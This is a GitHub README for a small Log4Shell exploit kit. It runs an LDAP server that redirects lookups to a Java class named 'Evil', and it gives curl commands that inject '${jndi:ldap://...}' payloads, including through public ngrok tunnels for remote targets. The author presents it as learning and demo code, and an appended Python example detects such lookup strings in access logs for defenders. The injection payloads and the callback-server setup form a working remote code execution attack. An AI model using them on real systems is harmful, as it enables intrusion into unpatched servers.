Kirill89/log4shell-vulnerable-server-exploit

Exploit for one more log4j2 (Log4Shell) vulnerable server

The server itself: https://github.com/Kirill89/log4shell-vulnerable-server

Java 8 is required.

How it works

The UnboundID LDAP SDK is used to run an LDAP server on port 9999. For any request, the server responds with an entry that points to a Java class served by an HTTP server on port 8888.

Build

docker build -t log4shell-vulnerable-server-exploit .

Run locally

You need to run the vulnerable server in the docker container first.

docker run -it --rm -p 8888:8888 -p 9999:9999 --name log4shell-vulnerable-server-exploit log4shell-vulnerable-server-exploit
curl http://localhost:8000
curl --user-agent '${jndi:ldap://host.docker.internal:9999/Evil}' http://localhost:8000

Run remotely

ngrok tcp 9999
ngrok http 8888
docker run -it --rm -p 8888:8888 -p 9999:9999 --env HTTP_SERVER_HOST=http://a8465040ee4f.ngrok.io/ --name log4shell-vulnerable-server-exploit log4shell-vulnerable-server-exploit
curl http://localhost:8000
curl --user-agent '${jndi:ldap://6.tcp.ngrok.io:19132/Evil}' http://localhost:8000

Note:

  • Replace ngrok hosts with yours.
  • Instead of ngrok, you can use another TCP proxy or deploy the container to a public address.

Log4Shell mitigation cheat sheet

https://snyk.io/blog/log4shell-remediation-cheat-sheet/
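
For the detection side of the two curl requests above, this added example (not part of this repository) scans access-log lines for the `${jndi:...}` lookup string and lists the callback endpoints to check against egress logs. It assumes the target writes combined-format access logs; the sample lines are constructed, and `find_jndi_lookups` and `callback_endpoints` are hypothetical names. It matches only the literal form used in this README.

```python
import re
from urllib.parse import urlsplit

# Assumed combined log format:
# ip - - [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Literal lookup form used in this README: ${jndi:<scheme>://<host>:<port>/<name>}
JNDI_RE = re.compile(r"\$\{jndi:(?P<url>[a-z]+://[^}\s]+)\}", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 12 "-" "curl/7.79.1"',
    '192.0.2.10 - - [12/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 12 "-" '
    '"${jndi:ldap://host.docker.internal:9999/Evil}"',
    '203.0.113.7 - - [12/Dec/2021:10:02:41 +0000] "GET / HTTP/1.1" 200 12 "-" '
    '"${jndi:ldap://6.tcp.ngrok.io:19132/Evil}"',
]


def find_jndi_lookups(lines):
    """Return one finding per JNDI lookup string seen in a logged request field."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # line is not in the assumed format; skipped
        for field in ("request", "referer", "agent"):
            for hit in JNDI_RE.finditer(m.group(field)):
                url = urlsplit(hit.group("url"))
                try:
                    port = url.port
                except ValueError:  # non-numeric port in the logged string
                    port = None
                findings.append({"line": lineno, "client": m.group("ip"),
                                 "field": field, "scheme": url.scheme.lower(),
                                 "host": url.hostname, "port": port})
    return findings


def callback_endpoints(findings):
    """Distinct (host, port) pairs to search for in egress firewall and DNS logs."""
    pairs = {(f["host"], f["port"]) for f in findings}
    return sorted(pairs, key=lambda e: (e[0] or "", e[1] or 0))


if __name__ == "__main__":
    print(callback_endpoints(find_jndi_lookups(SAMPLE_LOG)))
```

A hit means the string reached the log, not that the lookup ran; outbound connections from the server to the listed endpoints are the stronger signal.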

Why one more exploit?

  1. Learning – I better understand things when I get my hands dirty.
  2. I prefer to use my own code for various demos.
  3. I like to keep things simple. Other exploits, in my opinion, are too big and difficult to read.
